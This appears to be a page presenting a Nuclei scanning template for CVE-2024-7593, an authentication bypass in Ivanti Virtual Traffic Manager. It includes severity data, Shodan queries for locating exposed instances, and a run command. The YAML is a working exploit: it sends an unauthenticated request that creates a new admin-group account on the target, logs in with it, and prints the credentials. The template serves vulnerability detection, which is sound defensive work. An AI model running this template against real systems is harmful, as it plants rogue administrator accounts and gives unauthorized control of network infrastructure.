Ivanti vTM - Authentication Bypass

ID: CVE-2024-7593

Severity: critical

Author: gy741

Tags: packetstorm,cve2024,cve,auth-bypass,ivanti,intrusive,kev

Description

Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.

YAML Source

id: CVE-2024-7593

info:
  name: Ivanti vTM - Authentication Bypass
  author: gy741
  severity: critical
  description: |
    Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7593
    - https://packetstormsecurity.com/files/download/179906/ivantiadc99-bypass.txt
    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-7593
    cwe-id: CWE-287
    epss-score: 0.00043
    epss-percentile: 0.09526
  metadata:
    verified: true
    max-request: 2
    vendor: ivanti
    product: virtual traffic manager
    shodan-query:
      - http.favicon.hash:1862800928
      - html:"apps/zxtm/login.cgi"
  tags: packetstorm,cve2024,cve,auth-bypass,ivanti,intrusive,kev
flow: http(1) && http(2)

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1
        Host: {{Hostname}}

        _form_submitted=form&create_user=Create&group=admin&newusername={{username}}&password1={{password}}&password2={{password}}

    matchers:
      - type: word
        part: body
        words:
          - "wizardtitletext"
        internal: true

  - raw:
      - |
        @timeout: 15s
        POST /apps/zxtm/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: {[RootURL]}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Referer: {{RootURL}}/apps/zxtm/login.cgi

        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="_form_submitted"

        form
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_username"

        {{username}}
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_password"

        {{password}}
        ------WebKitFormBoundarycznFUOqD0Y01A9B5
        Content-Disposition: form-data; name="form_submit"

        Login
        ------WebKitFormBoundarycznFUOqD0Y01A9B5--

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: /apps/zxtm/"
          - "Set-Cookie: ZeusTMZAUTH="
          - "Set-Cookie: ZeusTMZAUTHTIME="
        condition: and

      - type: status
        status:
          - 302

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a0047304502203e5c67146323a2633c8088e4b3ab9950c6d5880657d97331c06f1c40aef13927022100870cef93a824d5bae9e01e341b7184a711778e86f34557298dcfdbfa6e3b1485:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-7593.yaml"

View on Github